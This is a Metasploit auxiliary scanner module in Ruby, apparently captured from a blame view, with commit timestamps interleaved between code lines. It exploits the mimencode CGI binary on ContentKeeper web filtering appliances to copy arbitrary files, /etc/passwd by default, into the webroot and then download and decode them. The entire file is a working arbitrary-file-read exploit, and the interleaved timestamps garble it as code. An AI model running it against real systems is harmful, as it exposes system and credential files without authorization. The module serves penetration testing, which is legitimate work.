2011-04-10 15:27:17 +00:00
##
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
2013-10-15 18:50:46 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2011-04-10 15:27:17 +00:00
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf :: Auxiliary
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
include Msf :: Exploit :: Remote :: HttpClient
include Msf :: Auxiliary :: Scanner
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
def initialize
super (
'Name' = > 'ContentKeeper Web Appliance mimencode File Access' ,
'Description' = > %q{
This module abuses the 'mimencode' binary present within
ContentKeeper Web filtering appliances to retrieve arbitrary
files outside of the webroot .
} ,
'References' = >
[
2016-07-15 17:00:31 +00:00
[ 'OSVDB' , '54551' ] ,
2013-08-30 21:28:54 +00:00
[ 'URL' , 'http://www.aushack.com/200904-contentkeeper.txt' ] ,
] ,
'Author' = > [ 'patrick' ] ,
'License' = > MSF_LICENSE )
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
register_options (
[
OptString . new ( 'FILE' , [ true , 'The file to traverse for' , '/etc/passwd' ] ) ,
OptString . new ( 'URL' , [ true , 'The path to mimencode' , '/cgi-bin/ck/mimencode' ] ) ,
2017-05-03 20:42:21 +00:00
] )
2013-08-30 21:28:54 +00:00
end
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
def run_host ( ip )
begin
tmpfile = Rex :: Text . rand_text_alphanumeric ( 20 ) # Store the base64 encoded traveral data in a hard-to-brute filename, just in case.
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
print_status ( " Attempting to connect to #{ rhost } : #{ rport } " )
res = send_request_raw (
{
'method' = > 'POST' ,
'uri' = > normalize_uri ( datastore [ 'URL' ] ) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore [ 'FILE' ] ,
} , 25 )
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
if ( res and res . code == 500 )
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
print_status ( " Request appears successful on #{ rhost } : #{ rport } ! Response: #{ res . code } " )
2011-11-20 02:12:07 +00:00
2013-08-30 21:28:54 +00:00
file = send_request_raw (
{
'method' = > 'GET' ,
'uri' = > '/' + tmpfile ,
} , 25 )
2011-11-20 02:12:07 +00:00
2013-08-30 21:28:54 +00:00
if ( file and file . code == 200 )
print_status ( " Request for #{ datastore [ 'FILE' ] } appears to have worked on #{ rhost } : #{ rport } ! Response: #{ file . code } \r \n #{ Rex :: Text . decode_base64 ( file . body ) } " )
elsif ( file and file . code )
print_error ( " Attempt returned HTTP error #{ res . code } on #{ rhost } : #{ rport } Response: \r \n #{ res . body } " )
end
elsif ( res and res . code )
print_error ( " Attempt returned HTTP error #{ res . code } on #{ rhost } : #{ rport } Response: \r \n #{ res . body } " )
end
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
rescue :: Rex :: ConnectionRefused , :: Rex :: HostUnreachable , :: Rex :: ConnectionTimeout
rescue :: Timeout :: Error , :: Errno :: EPIPE
2011-04-10 15:27:17 +00:00
2013-08-30 21:28:54 +00:00
end
end
2011-04-10 15:27:17 +00:00
end